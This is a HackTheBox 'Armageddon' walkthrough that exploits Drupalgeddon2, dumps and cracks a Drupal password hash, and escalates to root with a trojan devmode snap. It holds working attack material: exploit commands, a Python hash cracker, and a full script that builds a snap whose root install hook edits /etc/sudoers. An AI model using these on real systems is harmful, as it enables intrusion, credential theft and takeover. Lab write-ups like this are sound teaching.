HackTheBox: (“Armageddon”) — Walkthrough

Mohamed Elmasry
5 min read · Jul 24, 2021

Hi People :D

Today we're going to solve the “Armageddon” machine from HackTheBox, an easy box that covers Drupal exploitation (Drupalgeddon2) and privilege escalation through snap. Let's get started :D

Enumeration

— — — — — —

Start with Nmap

nmap -A 10.10.10.233

Two ports are open (22/tcp SSH and 80/tcp HTTP), and the scan output identifies the website on port 80 as Drupal 7, so let's navigate to it.

Web Enumeration
— — — — — — — —

We have simple register and login pages, but we can't create a new account because the site fails to send the confirmation e-mail: “Unable to send e-mail …

Let's move to the next step: fuzzing directories.

Fuzzing returns a lot of files, but /profiles/testing/testing.info is the most important one (I used the Dirsearch tool for the fuzzing).

./dirsearch -u http://10.10.10.233/ -e "*" -i 200

The testing.info file reveals the exact Drupal version (“7.56”), so we can now confirm that the website is running Drupal 7.56. That matters: 7.56 predates 7.58, the release that fixed the Drupalgeddon2 remote code execution bug (CVE-2018-7600).

Drupal is a free and open-source web content management framework written in PHP (see the Drupal project site for more information).

Let's search for an exploit. I found this GitHub repo, which contains an automatic exploitation script.

Exploitation
— — — — — —

Let’s download this repo using:

git clone https://github.com/dreadlocked/Drupalgeddon2.git
cd Drupalgeddon2/

Then run the script using:

./drupalgeddon2.rb http://10.10.10.233/

And we easily get a shell as the apache user ☺

Or you can use this Metasploit module.

First load the module, then set its options (RHOSTS is the target, LHOST the interface your listener binds to) and run it:

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 10.10.10.233
set LHOST tun0

exploit

We get a shell as the apache user from Metasploit as well ☺

User Flag
— — — — —

After you get the apache shell, move to the /var/www/html/sites/default directory: two PHP scripts there contain the drupaluser database credentials (drupaluser:CQHEy@9M*m23gBVj).

You can grep for these creds using:

cat * | grep username && cat * | grep password

These creds are for the MySQL database, so let's look there for passwords or hashes.

First, two caveats about the client. The shell from Drupalgeddon2 is not an interactive TTY, so rather than opening the mysql client, pass each query with -e. And the password must follow -p with no space (with a space, mysql prompts for a password and treats the next word as the database name); it also needs quoting because of the * and @ characters. List all databases:

mysql -u drupaluser -h localhost -p'CQHEy@9M*m23gBVj' -e 'SHOW DATABASES;'

Second, select the drupal database and list its tables:

mysql -u drupaluser -h localhost -p'CQHEy@9M*m23gBVj' -e 'USE drupal; SHOW TABLES;'

There is a users table, which should hold the users' password hashes.

The last step is to dump the contents of the users table:

mysql -u drupaluser -h localhost -p'CQHEy@9M*m23gBVj' -e 'USE drupal; SELECT * FROM users;'

The users table contains the hash for brucetherealadmin: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

Let's try to crack this hash: put it into a file called hash, then run john against that file with the rockyou wordlist (the $S$ prefix marks a Drupal 7 hash, john's Drupal7 format).

Wait for the cracking run to finish, then execute john hash --show to see the result.

The hash cracks successfully and the password is booboo.
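To see what john is actually computing for that $S$ hash, here is a pure-Python reimplementation of Drupal 7's password scheme (a port of _password_crypt() and _password_base64_encode() from modules/user/password.inc), as an added example that is not part of the original writeup. It verifies the recovered password against the hash quoted above without a cracker, and shows why the scheme is slow to brute-force: the fourth character of the hash ('D') encodes an iteration count of 2^15, so every guess costs 32769 SHA-512 calls. The function names, the toy crack() helper and the mini-wordlist are my own.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Alphabet of Drupal 7's custom base64: '.'=0, '/'=1, then 0-9, A-Z, a-z.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # stored hashes are truncated to 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30  # Drupal rejects iteration counts outside 2^7 .. 2^30
MAX_PASSWORD_LEN = 512      # Drupal refuses to hash longer passwords (DoS guard)

# Hash pulled from the users table earlier in the walkthrough.
BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def _b64_encode(data: bytes) -> str:
    """Port of _password_base64_encode(): 24-bit little-endian groups, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """Split the 12-char prefix: '$S$' + one count character + 8-char salt."""
    setting = stored[:12]
    if len(setting) != 12 or setting[:3] != "$S$":
        raise ValueError("not a Drupal 7 $S$ (sha512) hash")
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return count_log2, setting[4:12]


def drupal7_crypt(password: str, setting: str) -> str:
    """Port of _password_crypt('sha512', ...): sha512(salt+pw), then 2^count rounds of sha512(h+pw)."""
    if len(password) > MAX_PASSWORD_LEN:
        raise ValueError("password too long")
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _b64_encode(digest))[:HASH_LENGTH]


def make_hash(password: str, salt: str, count_log2: int = 15) -> str:
    """Build a fresh hash; Drupal 7 defaults to count_log2=15 ('D') and a random 8-char salt."""
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


def check_password(password: str, stored: str) -> bool:
    """What user_check_password() does for $S$ hashes: recompute and compare in constant time."""
    try:
        return hmac.compare_digest(drupal7_crypt(password, stored), stored)
    except ValueError:
        return False


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Toy wordlist attack: 2^15 + 1 SHA-512 calls per guess is why this is slow at rockyou scale."""
    for word in candidates:
        if check_password(word, stored):
            return word
    return None


if __name__ == "__main__":
    guesses = ["123456", "password", "booboo"]  # constructed mini-wordlist, not rockyou
    print("brucetherealadmin ->", crack(BRUCE_HASH, guesses))
```

The comparison uses hmac.compare_digest rather than == so the check does not leak timing; Drupal's own PHP code uses a plain string comparison, which is harmless there because the expensive part is the iterated hashing, not the compare.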

We can now SSH into brucetherealadmin using:

ssh brucetherealadmin@10.10.10.233 
pass: booboo

And we finally found the user flag ☺

Root Flag
— — — — —

Execute sudo -l: it shows that you can run snap install as root without a password, and the machine is running snap 2.47.1-1.el7.

After some searching, I found this GitHub repo, which talks about privilege escalation through snap by installing an empty devmode snap that adds a new user to the local system, and this user has permission to execute sudo commands.

We only need the trojan part of dirty_sockv2.py. The snapd socket bug the script itself exploits (CVE-2019-7304) was fixed in snapd 2.37, so it does not apply to 2.47.1; but since sudo already lets us run snap install as root, the malicious snap alone is enough.

But before we use it we should know what it does, right? It's base64-encoded, so let's decode it.

Decoded, it adds a new user called dirty_sock (with a precomputed password hash) using useradd, tries to add that user to the sudo group with usermod, and grants it full sudo rights by appending a line to /etc/sudoers with echo; the rest of the blob is the squashfs structure of the snap package itself. One caveat for this box: CentOS 7 has no sudo group (it uses wheel), so the usermod step fails harmlessly and the /etc/sudoers line is what actually gives the new user its privileges.

Now copy the trojan blob, strip all whitespace from it, base64-decode it with python and write the output to a file called exp.snap, as follows:

Run that decoding command on the target machine, then execute sudo /usr/bin/snap install --devmode exp.snap (the --devmode flag is required because the snap declares devmode confinement, which is also what lets its install hook touch the host).

The snap package installs successfully; to check that it worked, run su dirty_sock and enter dirty_sock when asked for a password.

Then run sudo -i, enter the password again (dirty_sock), and you have root privileges and can read the root flag ☺
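To make the mechanism concrete rather than relying on an opaque base64 blob, here is an added example (not from the original writeup or from the dirty_sock repository) that builds the same kind of trojan snap from scratch: an unpacked tree with meta/snap.yaml declaring devmode confinement and an executable meta/hooks/install, which snapd runs as root during installation. The snap name, the user name and the password-hash placeholder are my own choices; the hook mirrors the three commands described above, adjusted for CentOS's wheel group. Packing assumes mksquashfs is installed, and generating a real hash assumes openssl (openssl passwd -6 dirty_sock).

```python
import base64
import shutil
import stat
import subprocess
import tempfile
from pathlib import Path
from typing import Optional

# Names below are this example's own choices, not values from dirty_sock or the walkthrough.
SNAP_NAME = "dirty-sock"
USER = "dirty_sock"
# Placeholder: produce a real sha512crypt hash with `openssl passwd -6 dirty_sock` (assumes openssl).
PASSWORD_HASH_PLACEHOLDER = "$6$REPLACE_WITH_OPENSSL_PASSWD_OUTPUT"

SNAP_YAML = """\
name: {name}
version: '0.1'
summary: Empty devmode snap whose install hook runs as root
description: Added example for the Armageddon walkthrough, not the dirty_sock original
architectures:
- amd64
confinement: devmode
grade: devel
"""

# snapd runs meta/hooks/install as root while 'snap install' processes the package.
# With 'confinement: devmode' nothing stops it from editing /etc/passwd or /etc/sudoers.
INSTALL_HOOK = """\
#!/bin/sh
useradd {user} -m -p '{hash}' -s /bin/bash
# CentOS 7 ships a 'wheel' group instead of Debian's 'sudo'; the sudoers line below is what
# actually grants the privilege, so the group step is allowed to fail.
usermod -aG wheel {user} 2>/dev/null || true
echo '{user} ALL=(ALL:ALL) ALL' >> /etc/sudoers
"""


def build_snap_tree(root: Path, user: str = USER, password_hash: str = PASSWORD_HASH_PLACEHOLDER,
                    name: str = SNAP_NAME) -> dict:
    """Lay out the unpacked snap: meta/snap.yaml plus an executable meta/hooks/install."""
    hooks = root / "meta" / "hooks"
    hooks.mkdir(parents=True, exist_ok=True)
    snap_yaml = root / "meta" / "snap.yaml"
    snap_yaml.write_text(SNAP_YAML.format(name=name))
    hook = hooks / "install"
    hook.write_text(INSTALL_HOOK.format(user=user, hash=password_hash))
    hook.chmod(0o755)  # snapd will not run a hook that is not executable
    return {"root": root, "yaml": snap_yaml, "hook": hook}


def hook_is_runnable(hook: Path) -> bool:
    """Sanity check before packing: executable bit set and a shebang line present."""
    return bool(hook.stat().st_mode & stat.S_IXUSR) and hook.read_text().startswith("#!")


def pack_snap(root: Path, out: Path) -> Optional[Path]:
    """A .snap is a squashfs image; pack it with mksquashfs (assumed installed) or return None."""
    if shutil.which("mksquashfs") is None:
        return None
    subprocess.run(
        ["mksquashfs", str(root), str(out), "-noappend", "-comp", "xz", "-all-root"],
        check=True, stdout=subprocess.DEVNULL,
    )
    return out


def to_transfer_blob(snap_file: Path) -> str:
    """Base64 the image so it can be pasted into the target shell, as the writeup does."""
    return base64.b64encode(snap_file.read_bytes()).decode()


def build_example(user: str = USER, password_hash: str = PASSWORD_HASH_PLACEHOLDER) -> dict:
    """Build the tree in a fresh temporary directory (used by the demo below and by tests)."""
    return build_snap_tree(Path(tempfile.mkdtemp(prefix="snap-")), user, password_hash)


if __name__ == "__main__":
    tree = build_example()
    packed = pack_snap(tree["root"], tree["root"].parent / "exp.snap")
    if packed:
        print(f"packed {packed}; on the target: sudo /usr/bin/snap install --devmode exp.snap")
        print("base64 blob length:", len(to_transfer_blob(packed)))
    else:
        print(f"tree ready in {tree['root']} (install mksquashfs to pack it)")
```

The defensive lesson is the same one the sudo rule teaches: letting a user run snap install as root is equivalent to giving them root, because install hooks execute with full privileges and devmode removes the sandbox.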

Thanks for reading and I hope you love this writeup ❤.

You can give me respect on my HackTheBox account (if you want :D).


Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter